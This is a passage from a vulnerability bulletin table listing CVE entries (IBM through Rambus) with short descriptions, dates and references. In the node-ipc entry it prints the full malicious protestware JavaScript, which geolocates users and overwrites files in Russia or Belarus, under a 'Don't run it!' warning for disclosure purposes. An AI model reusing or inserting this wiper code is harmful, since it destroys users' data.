IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to reverse tabnabbing where it could allow a page linked to from within Operations Center to rewrite it. An administrator could enter a link to a malicious URL that another administrator could then click. Once clicked, that malicious URL could then rewrite the original page with a phishing page. IBM X-Force ID: 220139. | 2022-03-14 | not yet calculated | CVE-2022-22348 CONFIRM XF |
| ibm — spectrum_protect_plus |
IBM Spectrum Protect Plus 10.1.0.0 through 10.1.9.2 and IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 do not limit the length of a connection which could allow for a Slowloris HTTP denial of service attack to take place. This can cause the Admin Console to become unresponsive. IBM X-Force ID: 220485. | 2022-03-14 | not yet calculated | CVE-2022-22354 CONFIRM CONFIRM XF |
| in_pluck — in_pluck |
In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. | 2022-03-18 | not yet calculated | CVE-2022-26965 MISC MISC |
| irz — mobile_routers |
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor’s defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router’s default credentials aren’t rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. | 2022-03-19 | not yet calculated | CVE-2022-27226 MISC MISC MISC |
| jenkins — cloudbees_aws_credentials |
A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. | 2022-03-15 | not yet calculated | CVE-2022-27199 CONFIRM MLIST |
| jenkins — cloudbees_aws_credentials |
A cross-site request forgery (CSRF) vulnerability in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. | 2022-03-15 | not yet calculated | CVE-2022-27198 CONFIRM MLIST |
| jenkins — dashboard_view |
Jenkins Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet’s Iframe source URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views. | 2022-03-15 | not yet calculated | CVE-2022-27197 CONFIRM MLIST |
| jenkins — dbcharts |
Jenkins dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system. | 2022-03-15 | not yet calculated | CVE-2022-27216 CONFIRM MLIST |
| jenkins — environment_dashboard |
Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission. | 2022-03-15 | not yet calculated | CVE-2022-27213 CONFIRM MLIST |
| jenkins — extended_choice | Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller. | 2022-03-15 | not yet calculated | CVE-2022-27203 CONFIRM MLIST |
| jenkins — extended_choice | Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier does not escape the value and description of extended choice parameters of radio buttons or check boxes type, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. | 2022-03-15 | not yet calculated | CVE-2022-27202 CONFIRM MLIST |
| jenkins — extended_choice |
A cross-site request forgery vulnerability in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers to connect to an attacker-specified URL. | 2022-03-15 | not yet calculated | CVE-2022-27204 CONFIRM MLIST |
| jenkins — extended_choice |
A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. | 2022-03-15 | not yet calculated | CVE-2022-27205 CONFIRM MLIST |
| jenkins — favorite |
Jenkins Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions. | 2022-03-15 | not yet calculated | CVE-2022-27196 CONFIRM MLIST |
| jenkins — folder-based_authorization_strategy |
Jenkins Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. | 2022-03-15 | not yet calculated | CVE-2022-27200 CONFIRM MLIST |
| jenkins — git_branches_parameter |
Jenkins List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name of the ‘List Git branches (and more)’ parameter, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. | 2022-03-15 | not yet calculated | CVE-2022-27212 CONFIRM MLIST |
| jenkins — gitlab_authentication |
Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. | 2022-03-15 | not yet calculated | CVE-2022-27206 CONFIRM MLIST |
| jenkins — global-build-stats |
Jenkins global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the ‘Global Build Stats’ page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. | 2022-03-15 | not yet calculated | CVE-2022-27207 CONFIRM MLIST |
| jenkins — incapptic_connect_uploader |
Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. | 2022-03-15 | not yet calculated | CVE-2022-27218 CONFIRM MLIST |
| jenkins — kubernetes_continuous_deploy | Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows users with Credentials/Create permission to read arbitrary files on the Jenkins controller. | 2022-03-15 | not yet calculated | CVE-2022-27208 CONFIRM MLIST |
| jenkins — kubernetes_continuous_deploy |
A missing/An incorrect permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. | 2022-03-15 | not yet calculated | CVE-2022-27211 CONFIRM MLIST |
| jenkins — kubernetes_continuous_deploy |
A cross-site request forgery (CSRF) vulnerability in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. | 2022-03-15 | not yet calculated | CVE-2022-27210 CONFIRM MLIST |
| jenkins — kubernetes_continuous_deploy |
A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. | 2022-03-15 | not yet calculated | CVE-2022-27209 CONFIRM MLIST |
| jenkins — parameterized_trigger |
Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system. | 2022-03-15 | not yet calculated | CVE-2022-27195 CONFIRM MLIST |
| jenkins — release_helper |
A cross-site request forgery (CSRF) vulnerability in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. | 2022-03-15 | not yet calculated | CVE-2022-27214 CONFIRM MLIST |
| jenkins — release_helper |
A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. | 2022-03-15 | not yet calculated | CVE-2022-27215 CONFIRM MLIST |
| jenkins — semantic_versioning |
Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. | 2022-03-15 | not yet calculated | CVE-2022-27201 CONFIRM MLIST |
| jenkins — vmware_vrealize_codestream |
Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. | 2022-03-15 | not yet calculated | CVE-2022-27217 CONFIRM MLIST |
| kingsoft — internet_security_9_plus |
The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. | 2022-03-17 | not yet calculated | CVE-2022-25949 JVN CONFIRM |
| kunze_law — kunze_law |
The Kunze Law WordPress plugin before 2.1 does not escape its ‘E-Mail Error “From” Address’ settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0674 MISC |
| libnested — libnested |
The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930) | 2022-03-17 | not yet calculated | CVE-2022-25352 MISC MISC MISC |
| libvcs — libvcs |
The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. | 2022-03-14 | not yet calculated | CVE-2022-21187 MISC MISC MISC |
| ligeo_archives — ligeo_basics |
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. | 2022-03-17 | not yet calculated | CVE-2021-46107 MISC MISC |
| linux — linux_kernel |
In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file. | 2022-03-18 | not yet calculated | CVE-2021-45868 MISC MISC MISC MISC MISC |
| linux — linux_kernel |
Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc. | 2022-03-18 | not yet calculated | CVE-2022-0742 MISC MISC |
| linux — linux_kernel |
A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too. | 2022-03-18 | not yet calculated | CVE-2022-1011 MISC FEDORA FEDORA |
| linux — linux_kernel |
In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access. | 2022-03-16 | not yet calculated | CVE-2022-27223 MISC MISC |
| login_with_phone_number — login_with_phone_number |
The Login with phone number WordPress plugin before 1.3.7 includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated user to remotely delete the plugin files leading to a potential Denial of Service situation. | 2022-03-14 | not yet calculated | CVE-2022-0593 MISC MISC |
| maccms — maccms |
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks. | 2022-03-16 | not yet calculated | CVE-2021-45787 MISC |
| maccms — maccms |
In maccms v10, an attacker can log in through /index.php/user/login in the “col” and “openid” parameters to gain privileges. | 2022-03-16 | not yet calculated | CVE-2021-45786 MISC |
| master_addons_for_elementor — master_addons_for_elementor |
The Master Addons for Elementor WordPress plugin before 1.8.5 does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting | 2022-03-14 | not yet calculated | CVE-2022-0327 MISC |
| mattermost — mattermost |
One of the API in Mattermost version 6.3.0 and earlier fails to properly protect the permissions, which allows the system administrators to combine the two distinct privileges/capabilities in a way that allows them to override certain restricted configurations like EnableUploads. | 2022-03-18 | not yet calculated | CVE-2022-1003 MISC |
| mattermost — mattermost |
Mattermost 6.3.0 and earlier fails to properly sanitize the HTML content in the email invitation sent to guest users, which allows registered users with special permissions to invite guest users to inject unescaped HTML content in the email invitations. | 2022-03-18 | not yet calculated | CVE-2022-1002 MISC MISC |
| maxgalleria — maxgalleria |
Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5). | 2022-03-18 | not yet calculated | CVE-2022-25603 CONFIRM CONFIRM |
| meks_easy_photo_feed_widget — meks_easy_photo_feed_widget |
The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as subscriber could update the plugin’s settings and put Cross-Site Scripting payloads in them | 2022-03-14 | not yet calculated | CVE-2021-24958 MISC |
| microweber — microweber |
The microweber application allows large characters to insert in the input field “post title” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-15 | not yet calculated | CVE-2022-0961 CONFIRM MISC |
| microweber — microweber |
Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-15 | not yet calculated | CVE-2022-0963 CONFIRM MISC |
| microweber — microweber |
The microweber application allows large characters to insert in the input field “fist & last name” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12. | 2022-03-15 | not yet calculated | CVE-2022-0968 CONFIRM MISC |
| microweber — microweber |
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop’s Other Settings, Shop’s Autorespond E-mail Settings and Shops’ Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. | 2022-03-15 | not yet calculated | CVE-2022-0954 MISC CONFIRM |
| mikrotik — products |
In the SCEP Server of RouterOS in certain Mikrotik products, an attacker can trigger a heap-based buffer overflow that leads to remote code execution. The attacker must control the SCEP server for a valid certificate. This affects mikrotik-vm-6.46, mikrotik-vm-6.46.8, mikrotik-tile-6.46.8, mikrotik-6.47.9, and mikrotik-6.47.10. | 2022-03-16 | not yet calculated | CVE-2021-41987 MISC MISC |
| mimecast — email_security |
Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.) | 2022-03-16 | not yet calculated | CVE-2020-36519 MISC |
| minimist — minimist |
Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95). | 2022-03-17 | not yet calculated | CVE-2021-44906 MISC MISC MISC MISC MISC |
| misp — misp | An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF. | 2022-03-18 | not yet calculated | CVE-2022-27245 MISC |
| misp — misp | An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user. | 2022-03-18 | not yet calculated | CVE-2022-27244 MISC |
| misp — misp | An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting. | 2022-03-18 | not yet calculated | CVE-2022-27243 MISC |
| misp — misp |
An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default. | 2022-03-18 | not yet calculated | CVE-2022-27246 MISC |
| multisite_content_copier/updater — multisite_content_copier/updater |
The WordPress Multisite Content Copier/Updater WordPress plugin before 2.1.2 does not sanitise and escape the s parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in the network dashboard | 2022-03-14 | not yet calculated | CVE-2022-0503 MISC |
| netgear — netgear | A vulnerability is in the ‘BRS_top.html’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device. | 2022-03-17 | not yet calculated | CVE-2021-44261 MISC MISC |
| netgear — netgear |
A vulnerability is in the ‘MNU_top.htm’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device. | 2022-03-17 | not yet calculated | CVE-2021-44262 MISC MISC |
| netgear — routers |
A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication. | 2022-03-18 | not yet calculated | CVE-2022-24655 MISC MISC MISC |
| nicotine+ — nicotine+ |
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character. | 2022-03-15 | not yet calculated | CVE-2021-45848 MISC |
| node-imdb — node-imdb |
The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check. | 2022-03-16 | not yet calculated | CVE-2022-21164 MISC MISC |
| node-ipc — node-ipc |
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; | 2022-03-16 | not yet calculated | CVE-2022-23812 CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM |
| nvidia — flare |
NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable. | 2022-03-17 | not yet calculated | CVE-2022-21822 MISC |
| online_admission_system — online_admission_system |
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution. | 2022-03-18 | not yet calculated | CVE-2021-45835 MISC MISC MISC |
| online_banking_system — online_banking_system |
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php. | 2022-03-15 | not yet calculated | CVE-2022-25494 MISC |
| online_project_time_management_system — online_project_time_management_system | Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php. | 2022-03-16 | not yet calculated | CVE-2022-26293 MISC MISC |
| online_project_time_management_system — online_project_time_management_system |
A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field. | 2022-03-16 | not yet calculated | CVE-2022-26295 MISC |
| open_web_analytics — open_web_analytics |
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with ‘<?php (instead of the intended “<?php sequence) aren’t handled by the PHP interpreter. | 2022-03-18 | not yet calculated | CVE-2022-24637 MISC CONFIRM |
| opendocman — opendocman |
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product’s environment or lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2021-45834 MISC MISC MISC MISC |
| openexr — multipart_input_file |
A flaw was found in OpenEXR’s Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability. | 2022-03-16 | not yet calculated | CVE-2021-20299 MISC MISC MISC |
| openssl — openssl |
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: – TLS clients consuming server certificates – TLS servers consuming client certificates – Hosting providers taking certificates or private keys from customers – Certificate authorities parsing certification requests from subscribers – Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). | 2022-03-15 | not yet calculated | CVE-2022-0778 CONFIRM CONFIRM CONFIRM CONFIRM DEBIAN MLIST MLIST |
| opensuse — factory |
A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. | 2022-03-16 | not yet calculated | CVE-2022-21946 CONFIRM |
| opensuse — factory |
A Insecure Temporary File vulnerability in cscreen of openSUSE Factory allows local attackers to cause DoS for cscreen and a system DoS for non-default systems. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. | 2022-03-16 | not yet calculated | CVE-2022-21945 CONFIRM |
| openvpn — openvpn |
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials. | 2022-03-18 | not yet calculated | CVE-2022-0547 MISC MISC MISC |
| paramiko — paramiko |
In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure. | 2022-03-17 | not yet calculated | CVE-2022-24302 MISC MISC |
| pascom — cloud_phone_system | An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints. | 2022-03-18 | not yet calculated | CVE-2021-45967 MISC MISC MISC MISC |
| pascom — cloud_phone_system | An issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394. | 2022-03-18 | not yet calculated | CVE-2021-45968 MISC MISC MISC MISC MISC |
| pascom — cloud_phone_system |
An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters. | 2022-03-18 | not yet calculated | CVE-2021-45966 MISC MISC MISC |
| petfinder_listings — petfinder_listings |
The Petfinder Listings WordPress plugin through 1.0.18 does not escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0702 MISC |
| pgadmin_4 — pgadmin_4 |
When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write. | 2022-03-16 | not yet calculated | CVE-2022-0959 MISC |
| php — php |
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload. | 2022-03-17 | not yet calculated | CVE-2021-44087 MISC MISC MISC |
| pimcore — pimcore | Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. | 2022-03-15 | not yet calculated | CVE-2022-0894 CONFIRM MISC |
| pimcore — pimcore | Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. | 2022-03-16 | not yet calculated | CVE-2022-0911 CONFIRM MISC |
| pimcore — pimcore |
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. | 2022-03-16 | not yet calculated | CVE-2022-0704 CONFIRM MISC |
| pimcore — pimcore |
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. | 2022-03-16 | not yet calculated | CVE-2022-0705 CONFIRM MISC |
| pimcore — pimcore |
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. | 2022-03-15 | not yet calculated | CVE-2022-0893 CONFIRM MISC |
| piwigo — piwigo |
Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php. | 2022-03-18 | not yet calculated | CVE-2022-26266 MISC |
| piwigo — piwigo |
Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php. | 2022-03-18 | not yet calculated | CVE-2022-26267 MISC |
| post-loader — post-loader |
The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed. | 2022-03-17 | not yet calculated | CVE-2022-0748 MISC |
| price_table — price_table |
Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2). | 2022-03-18 | not yet calculated | CVE-2022-25604 CONFIRM CONFIRM |
| projectworlds — hospital_management_system |
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php. | 2022-03-16 | not yet calculated | CVE-2021-45852 MISC |
| prototype_pollution — prototype_pollution |
The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049) | 2022-03-17 | not yet calculated | CVE-2022-25354 MISC MISC MISC |
| qemu — e1000_nic_emulator |
An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. | 2022-03-16 | not yet calculated | CVE-2021-20257 MISC MISC MISC MISC |
| qemu — vhost-vsock_device |
A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0. | 2022-03-16 | not yet calculated | CVE-2022-26354 MISC |
| qemu — virtio-net_device |
A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0. | 2022-03-16 | not yet calculated | CVE-2022-26353 MISC |
| qs — qs |
A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. | 2022-03-17 | not yet calculated | CVE-2021-44907 MISC MISC MISC MISC |
| quake — quake |
The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands. | 2022-03-17 | not yet calculated | CVE-2021-23556 MISC MISC MISC MISC MISC |
| rambus_safezone — basic_crypto_module |
The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat’s factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate. | 2022-03-14 | not yet calculated | CVE-2022-26320 MISC CONFIRM MISC MISC |
| rapid7 — insight_agent |
